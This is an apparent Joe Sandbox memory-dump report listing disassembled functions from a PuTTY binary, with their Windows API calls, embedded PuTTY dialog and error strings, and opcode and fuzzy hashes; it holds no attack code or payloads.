Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: ba3fd798f5b962abb3acd3bea19c88606012793190862b0de3ec1155ea9fd9f5
Instruction ID: ab60ef501b58e6ddfc1c02491df11cf0c411e4fc51ad276cc6871e3fa0722f86
Opcode Fuzzy Hash: ba3fd798f5b962abb3acd3bea19c88606012793190862b0de3ec1155ea9fd9f5
Instruction Fuzzy Hash: 2031B33E500216ABCF269F54D844BAE7F66FF08355B1C415AFD5C4A2A1C332DCA1DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C631D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 00C63254

Strings

c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00C6321C
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C63217

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2774982218
Opcode ID: 6bb7763af031026b69474d1e98a4ad1101d4339c7bf3c900d32ba9f6f6c3c629
Instruction ID: 0a6c76488939f928a3c15ace87785294a61c2253ba2d39066183e1a7e6ed72e0
Opcode Fuzzy Hash: 6bb7763af031026b69474d1e98a4ad1101d4339c7bf3c900d32ba9f6f6c3c629
Instruction Fuzzy Hash: D3114570A44304EFEB308B08DDE6F3277E5EF4A314F110029F609872A2D761AE64DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C63640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000186,?,00000000), ref: 00C636D6

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C636A4
c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel, xrefs: 00C636A9

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel
API String ID: 3015471070-3354595037
Opcode ID: 9b13a1902f108411b94d313bdd93943db33270094c2e7425fa49ad773711230b
Instruction ID: c13759aaf4eda9a9d3f45116be4783a847902e7387c5c4db38f422507789c040
Opcode Fuzzy Hash: 9b13a1902f108411b94d313bdd93943db33270094c2e7425fa49ad773711230b
Instruction Fuzzy Hash: AC115771604205FFE720CE04D8C6F66B3E9FB89749F120529F9149B2A1C771EE58CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C635A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000187,?,00000000), ref: 00C6362D

Strings

c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0, xrefs: 00C6360F
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C6360A

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0
API String ID: 3015471070-2314330475
Opcode ID: f5a0a6a52207cd93710b6095a988f325544a4e63ca3f347328253c5a0c727c94
Instruction ID: 4a2a3be6b944f8f98026dc3df26d5a42a9776c2c27f897e6bd90b292a4cfdc82
Opcode Fuzzy Hash: f5a0a6a52207cd93710b6095a988f325544a4e63ca3f347328253c5a0c727c94
Instruction Fuzzy Hash: 9911C0B1608341EFD320CE14DDC6F16B7A8FB49708F120025F515972A2D371EE54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C63410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000199,?,00000000), ref: 00C634A0

Strings

c && c->ctrl->type == CTRL_LISTBOX, xrefs: 00C63473
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C6346E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX
API String ID: 3015471070-4041756395
Opcode ID: c233cc7d1d2496e3e9d99e530ebaed091cb669fe8e2ad9a7af4ec66601f00ede
Instruction ID: 34c7d1e1944ce56c66e34e1c1eb9cec6095340b9995eb0cd259c40a78e67364d
Opcode Fuzzy Hash: c233cc7d1d2496e3e9d99e530ebaed091cb669fe8e2ad9a7af4ec66601f00ede
Instruction Fuzzy Hash: C111CC71700201EFE321CE04DCC2F26B7A9EB89704F114529F944A7251CB72AD18CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C62DB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CheckRadioButton.USER32(?,?,?,-00000001), ref: 00C62E36

Strings

c && c->ctrl->type == CTRL_RADIO, xrefs: 00C62E13
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C62E0E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ButtonCheckRadio
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO
API String ID: 2493629399-2192640374
Opcode ID: 333341787ca70e1a5990d4229f8e1607706d06b29f3b7d4b17377e716eacd4f9
Instruction ID: 80c3b9cdbf98b0fcf0a27a0fc1faec9cb4242a2a3b3a8e8eced25158bf677543
Opcode Fuzzy Hash: 333341787ca70e1a5990d4229f8e1607706d06b29f3b7d4b17377e716eacd4f9
Instruction Fuzzy Hash: 0111DE72A04612EFC320CF15DCC5E16B3A8FF99749F118568F90897211E372BC2ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C6C710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ClearCommBreak.KERNEL32(?), ref: 00C6C766
CloseHandle.KERNEL32(?), ref: 00C6C76F

Strings

Error writing to serial device, xrefs: 00C6C787, 00C6C797

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: BreakClearCloseCommHandle
String ID: Error writing to serial device
API String ID: 2685284230-3232346394
Opcode ID: e3eaeca87996917994ae34831ea7d0b834e1795ac7f7dbfb74d22d9bc204801d
Instruction ID: 056c4599dff3eb2743cae30fcab432c4b19193c8ba77f098cce352543f8e4cce
Opcode Fuzzy Hash: e3eaeca87996917994ae34831ea7d0b834e1795ac7f7dbfb74d22d9bc204801d
Instruction Fuzzy Hash: 021160B49007019FD730EF24EC89A17B7E5AF10319F188A28F8AAC7291D731E954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C62F10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,?,00000000), ref: 00C62F89

Strings

c && c->ctrl->type == CTRL_CHECKBOX, xrefs: 00C62F73
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C62F6E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ButtonCheck
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
API String ID: 83588225-2295402166
Opcode ID: 54b9fd2361d3ed0915057514ab390dc771398cdd652db564a6e380e08139fd37
Instruction ID: 998667178ddd7d86bb6839ae60f0ce12ecc4288aa82bb22434d451a8e4d42fe3
Opcode Fuzzy Hash: 54b9fd2361d3ed0915057514ab390dc771398cdd652db564a6e380e08139fd37
Instruction Fuzzy Hash: AB014932648221AFC3208FA1EC81E67F7F4EF56705F054065F884A3251D371EC28C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00C636F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32(?,?,?), ref: 00C63766

Strings

c && c->ctrl->type == CTRL_TEXT, xrefs: 00C63753
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C6374E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_TEXT
API String ID: 3367045223-293863867
Opcode ID: 7f0485d36c1a44aca55ea1bde5d7692e6cc36a91dc6396967827f715c1ed02e4
Instruction ID: aab6b33d60e7c75bd0df8a2e27ef2357ea0666edd586f5cfe24ed1c4c25fa57f
Opcode Fuzzy Hash: 7f0485d36c1a44aca55ea1bde5d7692e6cc36a91dc6396967827f715c1ed02e4
Instruction Fuzzy Hash: 7B01ADB6604341AFD3209E55EAC1F0BB7A8EB4A704F010421FA0497212D372BD28CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C62FA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32(?,?), ref: 00C63009

Strings

c && c->ctrl->type == CTRL_CHECKBOX, xrefs: 00C62FF7
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C62FF2

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ButtonChecked
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
API String ID: 1719414920-2295402166
Opcode ID: 9e1c18a7636808f4c5eb48d96de766d8c6ccee7bdafded49b0051459a310443a
Instruction ID: 0edb7b608e6dc999a0e39312162e387971ddfb13d9e48595e2f30f46d7524a10
Opcode Fuzzy Hash: 9e1c18a7636808f4c5eb48d96de766d8c6ccee7bdafded49b0051459a310443a
Instruction Fuzzy Hash: 28F0F036600315FFD2319EA5ED86F2BB7E9FF45744F050025F504A2521E761AD28DBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00CA19C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00CA19E1
_strlen.LIBCMT ref: 00CA1A16

Strings

|| , xrefs: 00CA1A02

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: ||
API String ID: 4218353326-1685714724
Opcode ID: d24c41a91b9b7c939f182df5f70023646bcbec3cab59a3617f29ac0680e288ed
Instruction ID: 55794444004041d659c62e131c478ba75b1cbfab917fd288df9c3e528947c16e
Opcode Fuzzy Hash: d24c41a91b9b7c939f182df5f70023646bcbec3cab59a3617f29ac0680e288ed
Instruction Fuzzy Hash: 7C01A2B5941109AFD210B610AC46E6A739CEB423ACF094034FE1D53203E7366E69D6F6

Uniqueness

Uniqueness Score: -1.00%

Function 00C6D3CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C6D3FF
_strlen.LIBCMT ref: 00C6D435

Strings

the -pw option can only be used with the SSH protocol, xrefs: 00C6D96B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: the -pw option can only be used with the SSH protocol
API String ID: 4218353326-1177616114
Opcode ID: afe2629fddbc342220d805c8eab33e88cf168a83a8d542fd898c470b2304947d
Instruction ID: 42ebfa55df0da9d93c674ab5c0a748964da7f737baccb9d707564a381276f7a0
Opcode Fuzzy Hash: afe2629fddbc342220d805c8eab33e88cf168a83a8d542fd898c470b2304947d
Instruction Fuzzy Hash: BC0128FAE0428057E6216A306C87A7A3365AB93718F594025FC4E57303F776E91262A3

Uniqueness

Uniqueness Score: -1.00%

Function 00C46290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001,?,?,?,?,00000000,00000000), ref: 00C462D6
MessageBoxA.USER32(00000000,00000000,00000010), ref: 00C46302

Strings

%s Error, xrefs: 00C462E9

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CursorMessageShow
String ID: %s Error
API String ID: 2689832819-1420171443
Opcode ID: dfb5f70b7f2eba400946ec3aea67fc71e0c94fd444ca357e5c2a8cca0d977567
Instruction ID: 310a8b90787ab7a1e9d8b3b18b3de48ee8814f741985452b5402cdd2d5328307
Opcode Fuzzy Hash: dfb5f70b7f2eba400946ec3aea67fc71e0c94fd444ca357e5c2a8cca0d977567
Instruction Fuzzy Hash: 7C01D8B99103006FD7107B20FC07B6E3E65DB59304F484028F6498A3A2E9726918EBF3

Uniqueness

Uniqueness Score: -1.00%

Function 00C4B140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Unsupported protocol number found,00000000,00000030), ref: 00C4B18B

Strings

Unsupported protocol number found, xrefs: 00C4B184
%s Internal Error, xrefs: 00C4B172

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Message
String ID: %s Internal Error$Unsupported protocol number found
API String ID: 2030045667-184558026
Opcode ID: 36a70c7c1a49d2e2f5eb0c7ef878e5ab9aeb984f172375dd4a464bbdd748cbad
Instruction ID: 95a6a5cf66f3076d91494cf04a9ce79b2b5e977875044c32a0dd07e825e4c54b
Opcode Fuzzy Hash: 36a70c7c1a49d2e2f5eb0c7ef878e5ab9aeb984f172375dd4a464bbdd748cbad
Instruction Fuzzy Hash: 25E0E56AD843102BE72033743C07F5A31585B24719F088030F90D942E3F6A19954D673

Uniqueness

Uniqueness Score: -1.00%

Function 00C5ECF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000134), ref: 00C5ED2D

Strings

%s Security Alert, xrefs: 00C5ED15
The first host key type we have stored for this serveris %s, which is below the configured warning threshold.The server also provides the following types of host keyabove the threshold, which we do not have stored:%sDo you want to continue with this conne, xrefs: 00C5ED00

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Message
String ID: %s Security Alert$The first host key type we have stored for this serveris %s, which is below the configured warning threshold.The server also provides the following types of host keyabove the threshold, which we do not have stored:%sDo you want to continue with this conne
API String ID: 2030045667-3125611854
Opcode ID: 8d33f0b6b4f1f92d21f6a9b098b908047eebcc3cd32c30b427c0744c5b2d8853
Instruction ID: 6d0fe7962147b8976173526c981e1164ccf767be7ec71e166d3823faa9fc01f7
Opcode Fuzzy Hash: 8d33f0b6b4f1f92d21f6a9b098b908047eebcc3cd32c30b427c0744c5b2d8853
Instruction Fuzzy Hash: 42F090B76443002BD30026B1BC46F2B7AE8EB88758F084838F64CD6292F576E9189772

Uniqueness

Uniqueness Score: -1.00%

Function 00C5EC70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000134), ref: 00C5ECAD

Strings

%s Security Alert, xrefs: 00C5EC95
The first %s supported by the serveris %s, which is below the configuredwarning threshold.Do you want to continue with this connection?, xrefs: 00C5EC80

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Message
String ID: %s Security Alert$The first %s supported by the serveris %s, which is below the configuredwarning threshold.Do you want to continue with this connection?
API String ID: 2030045667-1123452757
Opcode ID: 83e1dd16ff7307dd1d651ceba5d685b0775a5316752e4b9c8a090e06aa481ffd
Instruction ID: 2da3cc15fe063dc1be8599118c050410ad69b2ddfe50fba0abd8fde4eb8ec0d6
Opcode Fuzzy Hash: 83e1dd16ff7307dd1d651ceba5d685b0775a5316752e4b9c8a090e06aa481ffd
Instruction Fuzzy Hash: C8F036B76443006BD70026B1BC46F6B76D9EB88758F0C4834F64CD6292F577E5149772

Uniqueness

Uniqueness Score: -1.00%

Function 00C5EEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000223), ref: 00C5EF1B

Strings

%s Log to File, xrefs: 00C5EF03
The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging., xrefs: 00C5EEEE

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Message
String ID: %s Log to File$The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging.
API String ID: 2030045667-4035860868
Opcode ID: 12d6041912149bb4950fa5d2b38afc17fae131cc5439f74f7f5f9f04b52540d9
Instruction ID: 7bfb90fe32692beb5d640a068da3ac655394ab5bce99dd9b98b96edd3738f3b7
Opcode Fuzzy Hash: 12d6041912149bb4950fa5d2b38afc17fae131cc5439f74f7f5f9f04b52540d9
Instruction Fuzzy Hash: ECF0A7B7B443103BE20432B47C47F6E36D8CB89B55F484030FA0DD62D2F96659149273

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BA40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

